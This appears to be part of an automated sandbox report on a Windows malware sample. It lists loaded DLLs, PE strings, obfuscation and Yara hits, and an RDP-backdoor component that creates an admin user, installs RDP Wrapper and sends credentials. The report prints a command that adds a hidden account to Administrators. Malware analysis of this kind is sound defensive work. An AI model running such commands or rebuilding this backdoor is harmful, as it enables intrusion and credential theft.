                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.ini
                                Source: C:\ProgramData\AFHDGDGIID.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                                Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                                Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                                Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                                Source: Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr
                                Source: Binary string: costura.costura.pdb.compressedlB^q source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: costura.costura.pdb.compressed source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr
                                Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                                Source: Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
                                Source: Binary string: RfxVmt.pdb source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
                                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2520015830.0000000037B54000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2498836602.000000002BC7A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                                Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                                Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
                                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2833427275.000000001FE3B000.00000002.00001000.00020000.00000000.sdmp
                                Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                                Source: Binary string: RfxVmt.pdbGCTL source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
                                Source: Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr
                                Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr

                                Data Obfuscation

                                barindex
                                Source: AFHDGDGIID.exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                Source: Yara matchFile source: 12.0.AFHDGDGIID.exe.b90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: AFHDGDGIID.exe PID: 3396, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\AFHDGDGIID.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe, type: DROPPED
                                Source: AFHDGDGIID.exe.2.drStatic PE information: 0xC8160FB5 [Sat May 16 21:10:13 2076 UTC]
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                                Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                                Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                                Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                                Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                                Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F142 push ecx; ret 2_2_0042F155
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00422D3B push esi; ret 2_2_00422D3D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DDB5 push ecx; ret 2_2_0041DDC8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00432715 push 0000004Ch; iretd 2_2_00432726
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C11B536 push ecx; ret 2_2_6C11B549
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044F116 push esi; retf 8_2_0044F117
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00438B7E push cs; iretd 8_2_00438B85
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD73C51 push es; retf 11_2_1FD73C57
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDAA45D push esi; ret 11_2_1FDAA45F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDA4BF0 push ecx; ret 11_2_1FDA4C03
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDDDB66 push esp; retf 11_2_1FDDDB67
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDDD568 push esp; retf 11_2_1FDDD570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDEF456 push ebx; ret 11_2_1FDEF457
                                Source: file.exeStatic PE information: section name: .text entropy: 7.9958244524809645
                                Source: IDBAFHDGDG.exe.2.drStatic PE information: section name: .text entropy: 7.995375019999394
                                Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.drStatic PE information: section name: .text entropy: 7.995375019999394
                                Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: .text entropy: 7.9958244524809645
                                Source: 66f5db9e54794_vfkagks[1].exe.2.drStatic PE information: section name: .text entropy: 7.9958244524809645
                                Source: AFHDGDGIID.exe.2.drStatic PE information: section name: .text entropy: 7.77601245760385
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.drStatic PE information: section name: .text entropy: 7.77601245760385

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
